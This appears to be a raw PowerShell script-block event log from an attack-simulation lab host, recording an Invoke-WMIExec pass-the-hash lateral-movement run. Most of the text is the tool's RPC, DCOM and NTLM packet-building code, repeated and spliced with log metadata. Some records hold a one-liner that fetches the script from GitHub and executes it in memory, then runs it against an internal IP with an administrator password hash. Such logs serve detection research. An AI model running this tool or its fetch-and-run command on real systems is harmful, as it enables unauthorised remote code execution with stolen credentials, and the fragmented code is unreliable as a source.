$packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemQueryInterface.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IPID",$packet_IPID) $packet_DCOMRemQueryInterface.Add("Refs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IIDs",[Byte[]](0x01,0x00)) $packet_DCOMRemQueryInterface.Add("Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IID",$packet_IID) return $packet_DCOMRemQueryInterface } function New-PacketDCOMRemRelease { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemRelease.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemRelease.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemRelease.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemRelease.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Unknown",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("InterfaceRefs",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID",$packet_IPID) $packet_DCOMRemRelease.Add("PublicRefs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID2",$packet_IPID2) $packet_DCOMRemRelease.Add("PublicRefs2",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs2",[Byte[]](0x00,0x00,0x00,0x00)) return $packet_DCOMRemRelease } function New-PacketDCOMRemoteCreateInstance { param([Byte[]]$packet_causality_ID,[String]$packet_target) [Byte[]]$packet_target_unicode = [System.Text.Encoding]::Unicode.GetBytes($packet_target) [Byte[]]$packet_target_length = [System.BitConverter]::GetBytes($packet_target.Length + 1) $packet_target_unicode += ,0x00 * (([Math]::Truncate($packet_target_unicode.Length / 8 + 1) * 8) - $packet_target_unicode.Length) [Byte[]]$packet_cntdata = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 720) [Byte[]]$packet_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 680) [Byte[]]$packet_total_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 664) [Byte[]]$packet_private_header = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 40) + 0x00,0x00,0x00,0x00 [Byte[]]$packet_property_data_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 56) $packet_DCOMRemoteCreateInstance = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMFlags",[Byte[]](0x01,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMReserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMCausalityID",$packet_causality_ID) $packet_DCOMRemoteCreateInstance.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown3",[Byte[]](0x00,0x00,0x02,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown4",$packet_cntdata) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCntData",$packet_cntdata) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFIID",[Byt67d843f0-6dfc-47ac-be04-dc356c87c6ebC:\Users\Administrator\Desktop\invoke-wmiexec.ps1 4104152150x0720681Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11. .\invoke-wmiexec.ps15ad51368-2163-482d-90a1-8b8cb9b63591 4104132150x0720350Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local110function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Addaa8f238f-c51d-421c-89a4-e8a8f102a1a1 4104152150x0720344Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}5ca3c052-138f-4fbe-b733-8cc678e9726c 4104152150x0720342Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}2b00020c-61d5-42e9-8df4-926564032922 4104132150x0719848Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local15function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 